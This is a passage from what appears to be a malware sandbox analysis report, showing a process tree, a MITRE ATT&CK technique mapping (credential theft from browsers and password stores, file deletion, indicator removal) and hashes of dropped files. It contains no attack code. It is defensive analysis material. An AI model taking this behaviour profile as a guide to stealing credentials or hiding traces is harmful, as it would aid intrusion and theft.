- Suspicious use of AdjustPrivilegeToken
PID:4628
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4792
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4868
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Hide Artifacts
1Ignore Process Interrupts
1Indicator Removal
3File Deletion
3Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
226B
MD528d7fcc2b910da5e67ebb99451a5f598
SHA1a5bf77a53eda1208f4f37d09d82da0b9915a6747
SHA2562391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c
SHA5122d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5b7e1db446e63a2aae76cd85440a08856
SHA1c900cc81335dd3ca6337e21f5bcde80f8e8a88f3
SHA2567305bcde3ba246a9b5c1666079c61596cc2ed2c651a1cd9e20557dba8a78c0e4
SHA512dd63e28017eec632868489e469dd2ba54f20a3024be44550b729a0384bd55c5aa78171f7416612cd5174047afc544e21678ca164359962312b1d853c9bff04ea
-
Filesize
1KB
MD5fab4db55b120bdb8f039cbf0cbb9b699
SHA1a27372a4f86a5b8e51b659dcd616514eb10ad905
SHA25647480518ed97ca484d21f125901d5d123a1da236d28a1c4afd7bb052f54abcf5
SHA5127ecfad64b3f9cc8a29e092d39eda8225a95e9861f83e6b1b522fb537386d4d4a8fcbd1dc9946f3075149541b225487817a60847a7e5ef18b77a4bc27145b5fa4
-
Filesize
1KB
MD52419d068e09423d5e7edec9bb8010870
SHA1445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba
SHA256d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac
SHA512053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264
-
Filesize
81B
MD5ea511fc534efd031f852fcf490b76104
SHA1573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
-
Filesize
720B
MD5f1ec936a604843f00159d2d32faf0435
SHA1c33fe32522a1ed0dd97f9d6da5a9e5a2965e9774
SHA256bdcbff15bfd70cb1d749842819845bf9ef5e3d17559c9be900a1f1b0ed11efbd
SHA51274c2c40b451ccdbb0c66900a9e5eb6189bcc29452b8649125317108375cc53f572e15a27487b05288930957c00eb96d72fd8164e98d2406bb4282f118b49cb43
-
Filesize
2KB
MD51c935ef28fdfd394b770d945d7f04d76
SHA129e251c3c40ce4ad1b2984bf26b444aa045d9b21
SHA256aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
SHA512a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD57605fb5c749eeea0b1b27fdaad78051c
SHA128388bf016af085bbcbacf8c516853942f6ec8d3
SHA256466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA5121a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
-
Filesize
211KB
MD5b6054dbe4ed853c2e35291f045a632ba
SHA11355fbe1ea1f6bb566921f04512f78590c4b0e41
SHA256b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4
SHA512648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0
-
Filesize
780B
MD560d646f40556d78166ad8111d850fc51
SHA1babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA5123fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6